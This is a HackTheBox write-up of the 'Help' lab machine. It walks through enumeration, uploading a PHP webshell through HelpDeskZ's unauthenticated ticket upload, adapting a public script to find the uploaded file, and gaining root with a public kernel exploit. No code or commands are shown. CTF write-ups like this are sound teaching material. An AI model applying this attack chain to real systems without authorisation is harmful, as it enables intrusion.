Select Page

HTB – Help Writeup

Jun 30, 2019 | Writeups

  • HackTheBox Dificulty Rating 43% 43%

OS:

Linux

Points:

20

Release date:

19 Jan 2018

This box was fairly straight forward. The user part has to do with an unauthenticated file upload found when submitting a ticket on the web application. The tricky part is making a python script found on searchsploit to work for finding the uploaded file. For root, there is a kernel exploit, also found on searchsploit. Let’s get to it.

 

User

I start of by doing a nmap. I usually do –sCV –O. From the output we can see that port 22, 80 and 3000 are open.

 

Port 80 has a standard Ubuntu installation screen so I let Dirbuster do an enumeration while I play around with the Node.js on port 3000.

After a few minutes of unlucky testing, I come back to the Dirbuster and see http://10.10.10.121/support/ takes me to a HelpDeskZ page. Some other interesting pages pop up, including a http://10.10.10.121/support/?v=staff page, but the first thing that catches my eye is an upload section on the Submit a Ticket tab.

 

After a quick search for “helpdeskz I get to a small python script that seems to search for the name of the uploaded file on the server. I proceed to upload a php webshell and lo and behold… the script can’t find anything.

After tweaking the script a little using the info found on the github page that contains the source code for the HelpDeskZ application (https://github.com/evolutionscript/HelpDeskZ-1.0) I managed to make the script work as intended.

 

So basically what I did was first keeping in mind that the upload is made in the /uploads/tickets/ folder. The second thing is that I needed to modify the script code to properly display the correct time of the upload (because the md5 hash is calculated from the name of the file + the time of the upload), as I was in no way near the timezone of the server (and also it was running 5-6 minutes late for some reason). To do this, I got the correct upload time from BurpSuite and hardcoded it into the python script as can be seen in the images below:

 

I also changed the range from 300 to 500 just to make sure I would hit the correct hash.

After this, I connected to the webshell and the first part was done.

 

 

Root

On the enumeration phase, a few things immediately popped up. There was the .bash_history file that contained a password-y looking string, a few files in the /home directory of the user, but after quickly searching the internet for the kernel version I found a link with an exploit specifically for Linux 4.4.0-116-generic

 

From here it was a straight shot: Copy the exploit -> compile -> execute -> profit

  • InfoSec enthusiast
  • Penetration tester
  • CTF player